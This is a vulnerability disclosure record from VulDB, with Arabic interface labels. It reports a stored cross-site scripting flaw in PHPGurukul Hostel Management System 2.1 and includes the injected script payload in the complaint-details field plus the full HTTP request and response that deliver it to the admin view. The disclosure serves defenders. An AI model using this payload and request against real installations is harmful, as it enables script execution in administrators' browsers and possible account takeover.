إرسال #698995: PHPGurukul Hostel Management System 2.1 Stored Cross Site Scriptingالمعلومات

عنوان	PHPGurukul Hostel Management System 2.1 Stored Cross Site Scripting
الوصف	Hostel management system has Stored Xss vulnerability. When you are on the register-complaint.php, you can enter the "><script>prompt(1)</script> payload that field. After that if you woudl like to see all complaints via all-complaints.php from admin page, you can click that record and you can see trigerred stored xss payload. Request: POST /hostel/register-complaint.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: http://localhost:8080/hostel/register-complaint.php Cookie: PHPSESSID=v3lgmjkcn4an87ju2n2jcv6vf4 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------253251627419174 Content-Length: 533 -----------------------------253251627419174 Content-Disposition: form-data; name="ctype" Electrical -----------------------------253251627419174 Content-Disposition: form-data; name="cdetails" "><script>prompt(1)</script> -----------------------------253251627419174 Content-Disposition: form-data; name="image"; filename="" ..... Response: HTTP/1.1 200 OK Date: Thu, 20 Nov 2025 22:01:27 GMT Server: Apache/2.4.4 (Win64) PHP/5.4.12 X-Powered-By: PHP/5.4.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 5745 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <script>alert('Complaint registerd. Complaint number is : is: 424986981');</script><script type='text/javascript'> document.location = 'my-complaints.php'; </script> <!doctype html> <html lang="en" class="no-js"> <head> <meta charset="UTF-8"> ......
المستخدم	harun.tamokur (UID 35839)
ارسال	20/11/2025 11:02 PM (5 أشهر منذ)
الاعتدال	23/11/2025 08:57 AM (2 days later)
الحالة	تمت الموافقة
إدخال VulDB	333341 [PHPGurukul Hostel Management System 2.1 /register-complaint.php cdetails البرمجة عبر المواقع]
النقاط	17

التالي ▸نظرة عامة ◂ السابق

Want to know what is going to be exploited?

We predict KEV entries!